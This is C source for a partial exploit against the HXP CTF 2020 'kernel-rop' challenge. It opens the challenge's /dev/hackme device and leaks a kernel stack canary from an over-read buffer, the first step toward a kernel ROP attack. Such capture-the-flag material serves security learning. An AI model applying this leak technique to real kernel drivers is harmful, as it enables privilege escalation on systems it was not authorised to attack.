HXP CTF 2020 >> kernel-rop | partial exploit
#include <fcntl.h>
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";   /* device node the gist opens; specific to this CTF challenge */
int64_t global_fd = 0;            /* descriptor filled in by open_dev(); 0 until then */
uint64_t cookie = 0;              /* value leak_cookie() copies out of the leaked buffer */
uint8_t cookie_off = 16;          /* index (in uint64_t slots) of that value in the leak; challenge-specific offset */
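/*
 * Open the device node named by VULN_DRV for read/write and store the
 * descriptor in global_fd.
 *
 * On failure the error is reported (the open() message plus errno text via
 * perror) and the process exits with -1; callers may therefore assume
 * global_fd is valid once this returns.
 */
void open_dev(void) {
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        perror("[-] open");   /* ENOENT vs EACCES matters when the node is missing or unreadable */
        exit(-1);
    }
    printf("[+] successfully opened %s\n", VULN_DRV);
}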
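/*
 * Read up to sizeof(leak) bytes from global_fd into a local buffer and take
 * the uint64_t at index cookie_off as the stack canary, storing it in cookie.
 *
 * Exits with -1 when read() fails, when it returns fewer bytes than are
 * needed to reach index cookie_off (this also covers cookie_off being past
 * the end of the buffer), or when the value read is zero.
 */
void leak_cookie(void) {
    enum { LEAK_SLOTS = 40 };   /* number of 8-byte slots requested per read */
    /* Fixed-size array instead of a VLA; zero-filled so nothing stale is
     * ever interpreted as a canary if the read is shorter than expected. */
    uint64_t leak[LEAK_SLOTS] = {0};

    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));

    ssize_t got = read(global_fd, leak, sizeof(leak));
    if (got < 0) {
        perror("[-] read");
        exit(-1);
    }

    /* Only trust slot cookie_off if the device actually returned that far. */
    size_t need = ((size_t)cookie_off + 1) * sizeof(leak[0]);
    if ((size_t)got < need) {
        printf("[-] short read: got %zd bytes, need %zu to reach index %d\n",
               got, need, cookie_off);
        exit(-1);
    }

    cookie = leak[cookie_off];
    printf("[+] found stack canary: 0x%" PRIx64 " @ index %d\n", cookie, cookie_off);
    if (!cookie) {
        puts("[-] failed to leak stack canary!");
        exit(-1);
    }
}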
/*
 * Entry point: open the device, then attempt the canary leak. Both helpers
 * exit the process themselves on failure, so reaching the return means
 * both steps succeeded. Command-line arguments are not used.
 */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;

    open_dev();
    leak_cookie();

    return EXIT_SUCCESS;
}